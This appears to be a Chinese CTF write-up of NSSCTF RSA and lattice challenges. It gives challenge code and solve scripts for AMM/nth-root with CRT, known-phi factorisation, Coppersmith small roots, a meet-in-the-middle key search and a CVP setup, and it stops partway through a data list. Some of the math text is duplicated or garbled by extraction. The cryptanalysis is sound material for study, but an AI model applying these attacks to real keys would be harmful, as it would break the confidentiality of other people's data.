诶,这里有老登偷偷炸鱼(bushi
无意中发现了一个在线Sagemath运行平台 ,10.4版本的 ,有需要可以使用(https://cocalc.com/features/sage 
下面是我自己比赛的时候自己做的(密码是river没做,web做了前几题,赛后继续做),然后再加上一点赛后学习别的师傅的wp整合起来的
基础的RSA,过于简单,不写了
from  Crypto.Util.number import  getPrime, bytes_to_longp=getPrime(128 ) q=getPrime(128 ) n=p*q phi=(p-1 )*(q-1 ) flag="NSSCTF{xxxxxx}"  print ("p=" ,p)print ("q=" ,q)m=bytes_to_long(flag.encode()) e=4  c=pow (m,e,n) print ("c=" ,c)print ("n=" ,n)''' p= 182756071972245688517047475576147877841 q= 305364532854935080710443995362714630091 c= 14745090428909283741632702934793176175157287000845660394920203837824364163635 n= 55807222544207698804941555841826949089076269327839468775219849408812970713531 ''' 
e = 4 与 ϕ 不互素,经典 A M M ,还是一样,懒人直接上师兄的科技 e=4与\phi 不互素,经典AMM,还是一样,懒人直接上师兄的科技 e = 4 与 ϕ 不 互 素 , 经 典 A M M , 还 是 一 样 , 懒 人 直 接 上 师 兄 的 科 技 
from  sage.all  import  *from  sage.parallel.multiprocessing_sage import  parallel_iter    import  itertoolsfrom  tqdm import  tqdmfrom  Crypto.Util.number import  *import  stringdef  nth_p (y, n, p, k=1  ):  assert  is_pseudoprime(p)   print ('[LOG] Solving pi = %s^%d'  % (hex (p), k))   try :     xs = Zmod(p**k)(y).nth_root(n, all =True )   except :     xs = GF(p**k)(y).nth_root(n, all =True )   xs = list (set (xs))   xs = [Integer(x) for  x in  xs]   return  xs def  nthRSA_p (c, e, p, k=1  ):  assert  is_pseudoprime(p)   P = Integer(pow (p, k))   phi = euler_phi(P)   rs = []   ei = e   while  True :     r = gcd(phi, ei)     if  r == 1 :       break      rs += [r]     ei //= r   r = product(rs)   dr = (e // r).inverse_mod(phi)   cr = pow (c, dr, P)   return  nth_p(cr, r, p, k) def  nthRSA_n (c, e, ps, ks=None , checker=None , ret1=False  ):     assert  isinstance (ps, list )   if  ks == None :     ks = [1 ] * len (ps)   else :     assert  len (ps) == len (ks)   ms = []   for  i in  range (len (ps)):     mp = nthRSA_p(c, e, ps[i], ks[i])     ms += [mp]   total = product([len (x) for  x in  ms])   print ('[Log] Doing crt.\nComplexity = %d: %s'  % (total, str ([len (x) for  x in  ms])))   res = []   Ps = [ps[i]**ks[i] for  i in  range (len (ps))]   for  msi in  tqdm(itertools.product(*ms), total=total):     m = crt(list (msi), Ps)     if  checker == None :       res += [m]       continue      if  checker(m):       if  not  ret1:         res += [m]         continue        return  m   return  res def  genHeaderChecker (hd ):  if  isinstance (hd, str ):     hd = hd.encode()   assert  isinstance (hd, bytes )   def  checkHeader (m ):     try :       flag = long_to_bytes(int (m))       if  hd in  flag:         print (flag)         return  True        return  False      except :       return  False    return  checkHeader def  genStrChecker (dict , n=65537   def  checkStr (m ):     try :       flag = long_to_bytes(int (m)).decode()       for  fi in  flag[:n]:         if  not  fi in  dict :           return  False        print (flag)       return  True      except :       return  False    return  checkStr p= 182756071972245688517047475576147877841  q= 305364532854935080710443995362714630091  c= 14745090428909283741632702934793176175157287000845660394920203837824364163635  n= 55807222544207698804941555841826949089076269327839468775219849408812970713531  e = 4  ps = [p, q] checker = genHeaderChecker('NSSCTF' ) res = nthRSA_n(c, e, ps, checker=checker) for  r in  res:  flag = long_to_bytes(int (r))   print (flag) 
这里也贴一个别的师傅的脚本 (可以不用上面较为复杂的AMM,所以代码比较简洁),利用nth_root进行开方根并crt求解
from  Crypto.Util.number import  *p= 182756071972245688517047475576147877841  q= 305364532854935080710443995362714630091  c= 14745090428909283741632702934793176175157287000845660394920203837824364163635  n= 55807222544207698804941555841826949089076269327839468775219849408812970713531  e= 4    phi = (p-1 )*(q-1 ) gcd = GCD(e,phi)   res1 = Zmod(p)(c).nth_root(gcd, all =True ) res2 = Zmod(q)(c).nth_root(gcd, all =True )   for  i in  res1:    for  j in  res2:         m = crt([int (i),int (j)],[p,q])         if  m is  not  None :             try :                 print (long_to_bytes(int (m)).decode())             except  Exception as  e:                 continue  
from  Crypto.Util.number import  getPrime, bytes_to_longfrom  secret import  fflag = b'NSSCTF{test_flag}'  p = getPrime(512 ) q = getPrime(512 ) n = p*q m = bytes_to_long(flag) e = 65537  c = pow (m,e,n) R.<x> = ZZ[] f = R(str (f)) w = pow (2 ,f(p),n) print (f'{n = } \n' )print (f'{e = } \n' )print (f'{c = } \n' )print (f'{f = } \n' )print (f'{w = } \n' )''' n = 101780569941880865465631942473186578520071435753163950944409148606282910806650879176280021512435190682009749926285674412651435782567149633130455645157688819845748439487113261739503325065997835517112163014056297017874761742768297646567397770742374004940360061700285170103292360590891188591132054903101398360047 e = 65537 c = 77538275949900942020886849496162539665323546686749270705418870515132296087721218282974435210763225488530925782158331269160555819622551413648073293857866671421886753377970220838141826468831099375757481041897142546760492813343115244448184595644585857978116766199800311200819967057790401213156560742779242511746 f = 2*x^332 - x^331 + x^329 + 3*x^328 - x^327 - 3*x^325 + x^323 - 3*x^322 - x^321 - 3*x^320 + x^319 + 2*x^318 - 4*x^317 - 3*x^315 - 2*x^314 + x^313 + x^312 + 2*x^311 + 2*x^309 + 2*x^308 + 5*x^307 + 2*x^306 + 3*x^305 + 5*x^304 + 4*x^303 + x^302 - x^301 - x^300 - 2*x^299 - 2*x^298 + x^297 + 3*x^296 - x^295 - 4*x^292 - x^290 + 4*x^289 - x^287 - 3*x^286 + x^285 - 2*x^284 + x^283 - x^282 - 2*x^281 + x^280 - 2*x^279 + x^278 + 2*x^277 - 3*x^276 - x^275 - 4*x^274 - 3*x^273 - 5*x^272 - 2*x^271 - 3*x^270 + 2*x^269 + 2*x^268 - x^267 - 2*x^266 + x^265 + x^264 - 3*x^262 - 3*x^259 + 2*x^258 - x^257 + 2*x^256 + 2*x^255 - x^254 - 2*x^253 - x^252 + 2*x^251 - x^250 + x^249 + 2*x^247 + 2*x^246 + 2*x^245 - 2*x^244 - 3*x^243 + 2*x^242 - 3*x^241 - x^240 - 3*x^239 - x^236 - 3*x^235 - 2*x^234 - x^233 - 2*x^232 - x^231 - 3*x^230 - 2*x^229 - 4*x^228 - 2*x^227 - 3*x^226 + 2*x^225 + x^224 - x^223 - 2*x^221 + 3*x^219 - x^217 - 2*x^216 + x^215 + 2*x^213 - x^212 + 3*x^211 + x^210 + 4*x^209 + x^208 - x^206 - x^205 - x^204 + 2*x^203 - 3*x^202 + 2*x^199 - x^198 + 2*x^196 - 2*x^195 + 3*x^194 + 3*x^193 - x^192 + 4*x^191 + 2*x^189 + x^186 - x^185 - x^184 + 3*x^183 + x^182 + 2*x^181 - 2*x^180 + x^177 + x^175 - x^173 + 3*x^172 + x^170 + x^169 - x^167 - 2*x^166 - x^165 - 4*x^164 - 2*x^163 + 2*x^162 + 4*x^161 - 2*x^160 - 3*x^159 - 2*x^158 - 2*x^157 + x^156 - x^155 + 3*x^154 - 4*x^153 + x^151 + 2*x^150 + x^149 - x^148 + 2*x^147 + 3*x^146 + 2*x^145 - 4*x^144 - 4*x^143 + x^142 - 2*x^140 - 2*x^139 + 2*x^138 + 3*x^137 + 3*x^136 + 3*x^135 + x^134 - x^133 + 2*x^132 + 3*x^130 - 3*x^129 - 2*x^128 - x^127 - 2*x^126 + x^125 + x^124 - 2*x^123 + x^122 - x^121 + 3*x^120 - x^119 - 2*x^118 - x^117 - x^116 - 2*x^115 + 2*x^114 + 2*x^113 - 3*x^112 - x^111 - 4*x^110 + x^109 + x^108 + x^106 - 4*x^105 + x^104 - x^103 - x^101 + x^100 - 2*x^99 + x^98 - x^97 + 3*x^96 + 3*x^94 - x^93 - x^92 + x^91 - 2*x^90 + x^89 - x^88 + x^87 - x^86 + x^85 + x^84 - x^83 + x^79 - 3*x^78 - 2*x^77 + x^74 + 3*x^73 - x^72 - 3*x^71 - 2*x^70 + x^69 - 3*x^66 + x^65 + x^64 - 4*x^62 - x^61 + x^60 - x^59 + 3*x^58 - x^57 - x^54 + 3*x^53 + x^51 - 3*x^50 - x^49 + 2*x^47 - x^46 - x^44 + x^43 - x^42 - 4*x^41 - 3*x^39 - x^37 - x^36 - 3*x^35 + x^34 + x^33 - 2*x^32 + 2*x^31 - x^30 + 2*x^29 - 2*x^28 - 2*x^27 - x^24 + x^22 - 5*x^21 + 3*x^20 + 2*x^19 - x^18 + 2*x^17 + x^16 - 2*x^15 - 2*x^14 + x^13 + x^12 + 2*x^11 - 3*x^10 + 3*x^9 + 2*x^8 - 4*x^6 - 2*x^5 - 4*x^4 + x^3 - x^2 - 1 w = 32824596080441735190523997982799829197530203904568086251690542244969244071312854874746142497647579310192994177896837383837384405062036521829088599595750902976191010000575697075792720479387771945760107268598283406893094243282498381006464103080551366587157561686900620059394693185990788592220509670478190685244 ''' 
根据费马小定理, 2 f ( p ) ( m o d   n ) ≡ 2 f ( p )   m o d   ( p − 1 ) ( m o d   p ) ,这步 s a g e 就可以直接解了 根据费马小定理,2^{f(p)}(mod\ n)\equiv 2^{f(p)\ mod\ (p-1)}(mod\ p),这步sage就可以直接解了 根 据 费 马 小 定 理 , 2 f ( p ) ( m o d   n ) ≡ 2 f ( p )   m o d   ( p − 1 ) ( m o d   p ) , 这 步 s a g e 就 可 以 直 接 解 了 或者有, f ( p ) = f ( 1 ) = − 57   m o d   p − 1 或者有,f(p)=f(1)=-57\ mod\ p-1 或 者 有 , f ( p ) = f ( 1 ) = − 5 7   m o d   p − 1 为什么二者相等呢?因为 为什么二者相等呢?因为 为 什 么 二 者 相 等 呢 ? 因 为 f ( x ) = a n ∗ x n + a n − 1 ∗ x n − 1 + a n − 2 ∗ x n − 2 + . . . + a 0 ∗ x 0 f(x)=a_{n}*x^{n}+a_{n-1}*x^{n-1}+a_{n-2}*x^{n-2}+...+a_{0}*x^{0} f ( x ) = a n  ∗ x n + a n − 1  ∗ x n − 1 + a n − 2  ∗ x n − 2 + . . . + a 0  ∗ x 0 f ( p )   m o d   p − 1 = a n + a n − 1 + a n − 2 + . . . + a 0 = f ( 1 )   m o d   p − 1 f(p)\ mod\ p-1=a_{n}+a_{n-1}+a_{n-2}+...+a_{0}=f(1)\ mod\ p-1 f ( p )   m o d   p − 1 = a n  + a n − 1  + a n − 2  + . . . + a 0  = f ( 1 )   m o d   p − 1 
还有位师傅的思路是换元 ,还有下面那题二元的换元消y ,不是很能理解
from  Crypto.Util.number import  *n = 101780569941880865465631942473186578520071435753163950944409148606282910806650879176280021512435190682009749926285674412651435782567149633130455645157688819845748439487113261739503325065997835517112163014056297017874761742768297646567397770742374004940360061700285170103292360590891188591132054903101398360047  e = 65537  c = 77538275949900942020886849496162539665323546686749270705418870515132296087721218282974435210763225488530925782158331269160555819622551413648073293857866671421886753377970220838141826468831099375757481041897142546760492813343115244448184595644585857978116766199800311200819967057790401213156560742779242511746  w = 32824596080441735190523997982799829197530203904568086251690542244969244071312854874746142497647579310192994177896837383837384405062036521829088599595750902976191010000575697075792720479387771945760107268598283406893094243282498381006464103080551366587157561686900620059394693185990788592220509670478190685244  R.<x> = ZZ[] f = 2 *x^332  - x^331  + x^329  + 3 *x^328  - x^327  - 3 *x^325  + x^323  - 3 *x^322  - x^321  - 3 *x^320  + x^319  + 2 *x^318  - 4 *x^317  - 3 *x^315  - 2 *x^314  + x^313  + x^312  + 2 *x^311  + 2 *x^309  + 2 *x^308  + 5 *x^307  + 2 *x^306  + 3 *x^305  + 5 *x^304  + 4 *x^303  + x^302  - x^301  - x^300  - 2 *x^299  - 2 *x^298  + x^297  + 3 *x^296  - x^295  - 4 *x^292  - x^290  + 4 *x^289  - x^287  - 3 *x^286  + x^285  - 2 *x^284  + x^283  - x^282  - 2 *x^281  + x^280  - 2 *x^279  + x^278  + 2 *x^277  - 3 *x^276  - x^275  - 4 *x^274  - 3 *x^273  - 5 *x^272  - 2 *x^271  - 3 *x^270  + 2 *x^269  + 2 *x^268  - x^267  - 2 *x^266  + x^265  + x^264  - 3 *x^262  - 3 *x^259  + 2 *x^258  - x^257  + 2 *x^256  + 2 *x^255  - x^254  - 2 *x^253  - x^252  + 2 *x^251  - x^250  + x^249  + 2 *x^247  + 2 *x^246  + 2 *x^245  - 2 *x^244  - 3 *x^243  + 2 *x^242  - 3 *x^241  - x^240  - 3 *x^239  - x^236  - 3 *x^235  - 2 *x^234  - x^233  - 2 *x^232  - x^231  - 3 *x^230  - 2 *x^229  - 4 *x^228  - 2 *x^227  - 3 *x^226  + 2 *x^225  + x^224  - x^223  - 2 *x^221  + 3 *x^219  - x^217  - 2 *x^216  + x^215  + 2 *x^213  - x^212  + 3 *x^211  + x^210  + 4 *x^209  + x^208  - x^206  - x^205  - x^204  + 2 *x^203  - 3 *x^202  + 2 *x^199  - x^198  + 2 *x^196  - 2 *x^195  + 3 *x^194  + 3 *x^193  - x^192  + 4 *x^191  + 2 *x^189  + x^186  - x^185  - x^184  + 3 *x^183  + x^182  + 2 *x^181  - 2 *x^180  + x^177  + x^175  - x^173  + 3 *x^172  + x^170  + x^169  - x^167  - 2 *x^166  - x^165  - 4 *x^164  - 2 *x^163  + 2 *x^162  + 4 *x^161  - 2 *x^160  - 3 *x^159  - 2 *x^158  - 2 *x^157  + x^156  - x^155  + 3 *x^154  - 4 *x^153  + x^151  + 2 *x^150  + x^149  - x^148  + 2 *x^147  + 3 *x^146  + 2 *x^145  - 4 *x^144  - 4 *x^143  + x^142  - 2 *x^140  - 2 *x^139  + 2 *x^138  + 3 *x^137  + 3 *x^136  + 3 *x^135  + x^134  - x^133  + 2 *x^132  + 3 *x^130  - 3 *x^129  - 2 *x^128  - x^127  - 2 *x^126  + x^125  + x^124  - 2 *x^123  + x^122  - x^121  + 3 *x^120  - x^119  - 2 *x^118  - x^117  - x^116  - 2 *x^115  + 2 *x^114  + 2 *x^113  - 3 *x^112  - x^111  - 4 *x^110  + x^109  + x^108  + x^106  - 4 *x^105  + x^104  - x^103  - x^101  + x^100  - 2 *x^99  + x^98  - x^97  + 3 *x^96  + 3 *x^94  - x^93  - x^92  + x^91  - 2 *x^90  + x^89  - x^88  + x^87  - x^86  + x^85  + x^84  - x^83  + x^79  - 3 *x^78  - 2 *x^77  + x^74  + 3 *x^73  - x^72  - 3 *x^71  - 2 *x^70  + x^69  - 3 *x^66  + x^65  + x^64  - 4 *x^62  - x^61  + x^60  - x^59  + 3 *x^58  - x^57  - x^54  + 3 *x^53  + x^51  - 3 *x^50  - x^49  + 2 *x^47  - x^46  - x^44  + x^43  - x^42  - 4 *x^41  - 3 *x^39  - x^37  - x^36  - 3 *x^35  + x^34  + x^33  - 2 *x^32  + 2 *x^31  - x^30  + 2 *x^29  - 2 *x^28  - 2 *x^27  - x^24  + x^22  - 5 *x^21  + 3 *x^20  + 2 *x^19  - x^18  + 2 *x^17  + x^16  - 2 *x^15  - 2 *x^14  + x^13  + x^12  + 2 *x^11  - 3 *x^10  + 3 *x^9  + 2 *x^8  - 4 *x^6  - 2 *x^5  - 4 *x^4  + x^3  - x^2  - 1  p = GCD(w-pow (2 ,int (f%(x-1 ),n),n)) q = n // p d = inverse(e, (p - 1 ) * (q - 1 )) print (long_to_bytes(pow (c,d,n)).decode())
f % ( x − 1 ) ,这一看, s a g e 还是太强大了 f\%(x-1),这一看,sage还是太强大了 f % ( x − 1 ) , 这 一 看 , s a g e 还 是 太 强 大 了 
from  Crypto.Util.number import  *def  create ():    pl  = []     for  i in  range (3 ):         pl.append(getPrime(1024 ))     return  sorted (pl) pl = create() m=b'NSSCTF{xxxxxx}'  p,q,r = pl[0 ],pl[1 ],pl[2 ] n = p*q*r phi = (p-1 )*(q-1 )*(r-1 ) e=65537  phi_2=(p-1 )*(q-1 ) n2=p*q c=pow (bytes_to_long(m),e,n2) print (f'n={n} ' )print (f'phi={phi} ' )print (f'c={c} ' )""" n=3191868707489083296976422171754481125088448532695639929013026951283334085716937496519972309690132954050242378974370025245594553866043111294840209514577676946872746793700126873931085112786381515154186105142460622301297252278473097650013016482539838576476763183025029834004241446095147665598581368214114851984460699747964946764645986828307675081596907634022110868102739948513844625534865764252668312850364286204872187001344218083941399088833989233474318289529103178632284291007694811574023047207470113594082533713524606268388742119103653587354956091145288566437795469230667897089543048576812362251576281067933183713438502813206542834734983616378764909202774603304124497453696792428111112644362307853143219890039129054302905340695668256116233515323529918746264727874817221051242387145263342018617858562987223211598238069486447049955021864781104312134816578626968386395835285074116149472750100154961405785440009296096563521430833 phi=3191868707489083296976422171754481125088448532695639929013026951283334085716937496519972309690132954050242378974370025245594553866043111294840209514577676946872746793700126873931085112786381515154186105142460622301297252278473097650013016482539838576476763183025029834004241446095147665598581368214114851984394758254181484105857103844940487787404078873566779953101987404891507588290232992132681729619718279684673827347612899406697514777723904351697638562060304399923174376216080338949397741477013367831377040866937433520175862575061413321076151761545984886547872427147498175814451096795344136954743868643889768901204954902708679102384061694877757565486240670882343628571424084461972849147495569088820011108794930593172573959423278140327579049114196086428504291102619820322231225943837444001821535593671764186251713714593498207219093585758479440828038119079608764008747539277397742897542501803218788455452391287578171880267200 c=8847973599594272436100870059187158819529199340583461915617467299706215012295598155778224026186157290320191983062022702191439286020733625396165573681688842631368993650799220713225485752608650482408353598320160571916055498330875851476520668973214124194890108144336715482373743731578734960096351460142579903010557821654345995923836938260379746304222820835040419844947019844885128550552066290798665884099701340641403329066058638137944934073185448687990744852400616823426082588916251127609191094346267837812018236673478691437630461425526779014305216914035039981685211625653600564431704400207095883904994772993227506462664 """ 
脚本源自https://github.com/jvdsn/crypto-attacks/blob/master/attacks/factorization/known_phi.py SHCTF2024-week4就已经在题目中告诉我们了)
参考题目NKCTF2023-ez_rsa,Google搜attack phi n即可往下找到,作者的github仓库还有好多attack脚本
from  Crypto.Util.number import  *from  math import  gcdfrom  math import  isqrtfrom  random import  randrangefrom  gmpy2 import  is_primedef  factorize (N, phi ):    """      Recovers the prime factors from a modulus if Euler's totient is known.     This method only works for a modulus consisting of 2 primes!     :param N: the modulus     :param phi: Euler's totient, the order of the multiplicative group modulo N     :return: a tuple containing the prime factors, or None if the factors were not found     """     s = N + 1  - phi     d = s ** 2  - 4  * N     p = int (s - isqrt(d)) // 2      q = int (s + isqrt(d)) // 2      return  p, q def  factorize_multi_prime (N, phi ):    """      Recovers the prime factors from a modulus if Euler's totient is known.     This method works for a modulus consisting of any number of primes, but is considerably be slower than factorize.     More information: Hinek M. J., Low M. K., Teske E., "On Some Attacks on Multi-prime RSA" (Section 3)     :param N: the modulus     :param phi: Euler's totient, the order of the multiplicative group modulo N     :return: a tuple containing the prime factors     """     prime_factors = set ()     factors = [N]     while  len (factors) > 0 :                  N = factors[0 ]         w = randrange(2 , N - 1 )         i = 1          while  phi % (2  ** i) == 0 :             sqrt_1 = pow (w, phi // (2  ** i), N)             if  sqrt_1 > 1  and  sqrt_1 != N - 1 :                                  factors = factors[1 :]                 p = gcd(N, sqrt_1 + 1 )                 q = N // p                 if  is_prime(p):                     prime_factors.add(p)                 elif  p > 1 :                     factors.append(p)                 if  is_prime(q):                     prime_factors.add(q)                 elif  q > 1 :                     factors.append(q)                                  break              i += 1      return  list (prime_factors) if  __name__ =='__main__' :    e=65537      n=3191868707489083296976422171754481125088448532695639929013026951283334085716937496519972309690132954050242378974370025245594553866043111294840209514577676946872746793700126873931085112786381515154186105142460622301297252278473097650013016482539838576476763183025029834004241446095147665598581368214114851984460699747964946764645986828307675081596907634022110868102739948513844625534865764252668312850364286204872187001344218083941399088833989233474318289529103178632284291007694811574023047207470113594082533713524606268388742119103653587354956091145288566437795469230667897089543048576812362251576281067933183713438502813206542834734983616378764909202774603304124497453696792428111112644362307853143219890039129054302905340695668256116233515323529918746264727874817221051242387145263342018617858562987223211598238069486447049955021864781104312134816578626968386395835285074116149472750100154961405785440009296096563521430833      phi=3191868707489083296976422171754481125088448532695639929013026951283334085716937496519972309690132954050242378974370025245594553866043111294840209514577676946872746793700126873931085112786381515154186105142460622301297252278473097650013016482539838576476763183025029834004241446095147665598581368214114851984394758254181484105857103844940487787404078873566779953101987404891507588290232992132681729619718279684673827347612899406697514777723904351697638562060304399923174376216080338949397741477013367831377040866937433520175862575061413321076151761545984886547872427147498175814451096795344136954743868643889768901204954902708679102384061694877757565486240670882343628571424084461972849147495569088820011108794930593172573959423278140327579049114196086428504291102619820322231225943837444001821535593671764186251713714593498207219093585758479440828038119079608764008747539277397742897542501803218788455452391287578171880267200      c=8847973599594272436100870059187158819529199340583461915617467299706215012295598155778224026186157290320191983062022702191439286020733625396165573681688842631368993650799220713225485752608650482408353598320160571916055498330875851476520668973214124194890108144336715482373743731578734960096351460142579903010557821654345995923836938260379746304222820835040419844947019844885128550552066290798665884099701340641403329066058638137944934073185448687990744852400616823426082588916251127609191094346267837812018236673478691437630461425526779014305216914035039981685211625653600564431704400207095883904994772993227506462664      fac = factorize_multi_prime(n, phi)     p,q,r=sorted (fac)     phi=(p-1 )*(q-1 )     n=p*q     d=inverse(e,phi)     print (long_to_bytes(pow (c,d,n)).decode()) 
没想到这题居然还可以用coppersmith attack ,长见识了,还得是xm爷 
s ≡ c d   m o d   n 1 ≡ m e ∗ d   m o d   n 2   m o d   n 1 ≡ m   m o d   n 2   m o d   n 1 s\equiv c^{d}\ mod\ n_{1}\equiv m^{e*d}\ mod\ n_{2}\ mod\ n_{1}\equiv m\ mod\ n_{2}\ mod\ n_{1} s ≡ c d   m o d   n 1  ≡ m e ∗ d   m o d   n 2    m o d   n 1  ≡ m   m o d   n 2    m o d   n 1  
同时呢,m肯定是比n1,n2小的,看完exp,怎么说呢,有点似懂非懂(我这里写的思路也不一定对哦)
n =  phi =  c =  e = 65537  d = inverse(e,phi) s = pow (c,d,n) R.<x> = PolynomialRing(Zmod(n)) f = x-s res = f.small_roots(x=2 ^2048 ,beta = 0.4 , epsilon = 0.05 ) print (long_to_bytes(int (res[0 ])).decode())
from  Crypto.Util.number import  *from  hashlib import  md5from  secret import  KEY, flag  assert  int (KEY).bit_length() == 36 assert  not  isPrime(KEY)p = getPrime(1024 ) q = getPrime(1024 ) n = p * q e = 0x10001  ck = pow (KEY, e, n) assert  flag == b'NSSCTF{'  + md5(str (KEY).encode()).hexdigest().encode() + b'}' print (f"{n = } " )print (f"{e = } " )print (f"{ck = } " )''' n = 26563847822899403123579768059987758748518109506340688366937229057385768563897579939399589878779201509595131302887212371556759550226965583832707699167542469352676806103999861576255689028708092007726895892953065618536676788020023461249303717579266840903337614272894749021562443472322941868357046500507962652585875038973455411548683247853955371839865042918531636085668780924020410159272977805762814306445393524647460775620243065858710021030314398928537847762167177417552351157872682037902372485985979513934517709478252552309280270916202653365726591219198063597536812483568301622917160509027075508471349507817295226801011 e = 65537 ck = 8371316287078036479056771367631991220353236851470185127168826270131149168993253524332451231708758763231051593801540258044681874144589595532078353953294719353350061853623495168005196486200144643168051115479293775329183635187974365652867387949378467702492757863040766745765841802577850659614528558282832995416523310220159445712674390202765601817050315773584214422244200409445854102170875265289152628311393710624256106528871400593480435083264403949059237446948467480548680533474642869718029551240453665446328781616706968352290100705279838871524562305806920722372815812982124238074246044446213460443693473663239594932076 ''' 
中间相遇攻击 ,原理不难,36位的非素数,随便测了几个数字,大致可以分解为18和20位的两个数字
参考https://tangcuxiaojikuai.xyz/post/601c0957.html ,NCTF2021-rsa ,这题还是挺有意思的
from  Crypto.Util.number import  *from  tqdm import  tqdmfrom  hashlib import  md5n = 26563847822899403123579768059987758748518109506340688366937229057385768563897579939399589878779201509595131302887212371556759550226965583832707699167542469352676806103999861576255689028708092007726895892953065618536676788020023461249303717579266840903337614272894749021562443472322941868357046500507962652585875038973455411548683247853955371839865042918531636085668780924020410159272977805762814306445393524647460775620243065858710021030314398928537847762167177417552351157872682037902372485985979513934517709478252552309280270916202653365726591219198063597536812483568301622917160509027075508471349507817295226801011  e = 65537  ck = 8371316287078036479056771367631991220353236851470185127168826270131149168993253524332451231708758763231051593801540258044681874144589595532078353953294719353350061853623495168005196486200144643168051115479293775329183635187974365652867387949378467702492757863040766745765841802577850659614528558282832995416523310220159445712674390202765601817050315773584214422244200409445854102170875265289152628311393710624256106528871400593480435083264403949059237446948467480548680533474642869718029551240453665446328781616706968352290100705279838871524562305806920722372815812982124238074246044446213460443693473663239594932076  secret = 0  S = {pow (i,-e,n):i for  i in  tqdm(range (1 ,2 **20 ))} inv_ck = inverse(ck,n) for  j in  range (1 ,2 **18 ):    s = inv_ck*(pow (j,e,n))%n     if (s in  S):         secret = S[s]*j         flag = b'NSSCTF{'  + md5(str (secret).encode()).hexdigest().encode() + b'}'          print (flag)         break  
from  Crypto.Util.number import  *from  Crypto.Cipher import  AESimport  osfrom  Crypto.Util.Padding import  padfrom  secret import  flagmiku = 30  p = getPrime(512 ) key = getPrime(512 ) while  key> p:    key= getPrime(512 ) ts = [] gs = [] zs = [] for  i in  range (miku):    t = getPrime(512 )     z = getPrime(400 )     g= (t * key + z) % p     ts.append(t)     gs.append(g)     zs.append(z) print (f'p = {p} ' )print (f'ts = {ts} ' )print (f'gs = {gs} ' )iv= os.urandom(16 ) cipher = AES.new(str (key).encode()[:16 ], AES.MODE_CBC,iv) ciphertext=cipher.encrypt(pad(flag.encode(),16 )) print (f'iv={iv} ' )print (f'ciphertext={ciphertext} ' )
下面参考的是小鸡块师傅 的CVP 做法,https://tangcuxiaojikuai.xyz/post/6a2afd81.html 
from  Crypto.Util.number import  *from  Crypto.Cipher import  AESp = 13401991645840298882794100147034379521242237285821020793208518466205688272722127694554243298223159648613332253774886696888511245155898681828972316158766813  ts = [8016983781273189754281912962247057409930227455812224730112055674262101679986538896353333785641031178561641562965339977035588567181180100475283408488320671 , 12980173980684618239567238092970002844391225790428809984588444288874980047043175328056782109973890659670718383856150425014293022930574469326618263083648099 , 8109856702010014482292978050018141635784057812487351143916154508689142112615449144377702002382005662470835964315028619291602564624893518861557701327890923 , 12785373226115694299429762427866573289359143336748874789256870948157808484043436344897926547699412946084053665605873366419653263394817308889578649556482317 , 12293720016807713691819354075258380849321736691923473670291035750221768289875347194928451102365603432383881559318603460687890903510706219895796459019974867 , 9784378896444105030039569921777285228994264456281120536753266782980679466146906618674672118057906497814953677764528302638725540882074537262487534252076829 , 9241433814815706758885649801540944918822400007457713603674159882791199750057709773097552334465041959969676782253637817171507122904345522225398825682237481 , 11204803848333722110323297716136514262820561394355433234423667799557561253910421337700868735544193790444406938869863716247161888020220901893711513603634809 , 10851090251796215969502640347727949807230163009657915435491546953253351810608099195268759626721620529756828379004467476267712531905975334082089231769707617 , 11250957460128461102060212243723539805901629603092001540925013383541943835129096257407578679799378517176957440298695788786794500447140718667332595080944869 , 12248623923069220370917375593286718711586079377902376988707257328512455851210970182518826733646869485671374318338949112466814956514662420760908691130244383 , 11061068271412202445428992286301637014530049371871820612053163253748795430394720967354122057185625710764847486790478210908967065668096047462000900877243843 , 9250800791153158078642768324800520716511537203538708124830844957330029236789799844775267058446261708862442981956837389747149720449997356553753692631237873 , 11442112467994330302413453979716258058149104607244851803491048585747359474970005873336772224480265499136742622823880716879860377641238675210553131052206691 , 8851268226889934481971979527547782930762103134830344221114784617526682434893736517219781937490279514229768881864475696389373739501629994242420024622585309 , 8761826274329402585517262093482651333161640060627583337505498299736119877176278155436111156185319629046980645810012652601825582701466570339570478108791887 , 8173260008522260126563915135008278248111293487661172115633899079869720932758788675224579864948752039769531398938248083971071345978173279466336354696742377 , 11733325877716881936637372036969125985631514189799569847189115606745019694984456424617859168884541552882900918661071180298079869943357668081866511603361429 , 12798678249651545625305346509566263707129030745621625744465668772298872710674031103310015594375483838020916596533864897632924958154707810583510669376046159 , 11972367565183102195894957634073708898746516169055154830786380821612631063771935949099855541345280195465211676841845799521135332692746439801114025346776451 , 8309485355838062558333744941897142201736283502970173073711189070760311131678107029730686549988329677109870570827466668034034377094834508445549924223585219 , 10037957030668927878463105058548635761147918169468443696251870837018029994579358415317101911755591591785037623566701920710453008930531891302329922308475079 , 13221078857886779075714191159549244640144219704164657103905516889650093241197471185563906205007376146027157620524696025494715411571586859030421582641250071 , 13377141034964464295846379646837504968557246139611266461228568513844912255762222441387410898249170108735540582627742796017922462329606088337301365183628591 , 11503417590216916228951909788782481610038959664264972733435373475346403291387209063270057139621628854733942831548624992555175497319058962145185736395531609 , 10682562966818807073688884352394574841623385668134186058213080078637580526582062737913378756835873195913042020318042792997704842570481165538229628253983417 , 7009494733984067792833862756223517770477471938386639921019003601598472840183655333614008677846799784155444425042016748876974547683111073376705004070094301 , 9396274922380984183217450286560296708001013262936289587249206096013034374236192395477584831821730898646879768741299571262843654547918064041618890696711333 , 9055143657462834722016836241561857041386247088507191351272758917384350750091500866289528933248085632291073921554368989805281660196853938630560350667255913 , 7075881589550115729079726581415060529537262743216265811601339312252250745864621882784185460812341989475906020671174894015501378625757286896275136526488817 ] gs = [3547025130757031371763547817278671805806523773597386380426228204353325314755125874825372064344551510783942287325061869515563511720377069479838665918916338 , 561524185998066303459395863084068415723518371857539287162474295289737845979144864495515229777991463363132381517905379393086271602757286846999926034367409 , 10630918988200018501478600883655233518093875635494077893436132190015060760951001030031068630865667129447250982542911493607849695255758299063471724885107320 , 5385738167688714294394456876987750423263279740302210790063861475593679005286633965917637168163655774852001750955925563171806165861440634515967640179944804 , 3686451063569312252337028014973428925521749963152262622523483348285262144703447272544972123815729823760936936761643322992469583780002855185407873398768127 , 9596580956215126253893458055745193704575088913515678341231900675542245449333964660007025564677263334281046226112471415925784249910282102204627251580303047 , 9656829597739031272294632966205884640125918053307645634673206826103547310810254891833432384622548154588598670746803614688469837172848481449498079690935715 , 9907308304392368929600091658386459655450451232070442677496713774343506026327224070703486188335961098033888098971263207077722473044862118000082007110037557 , 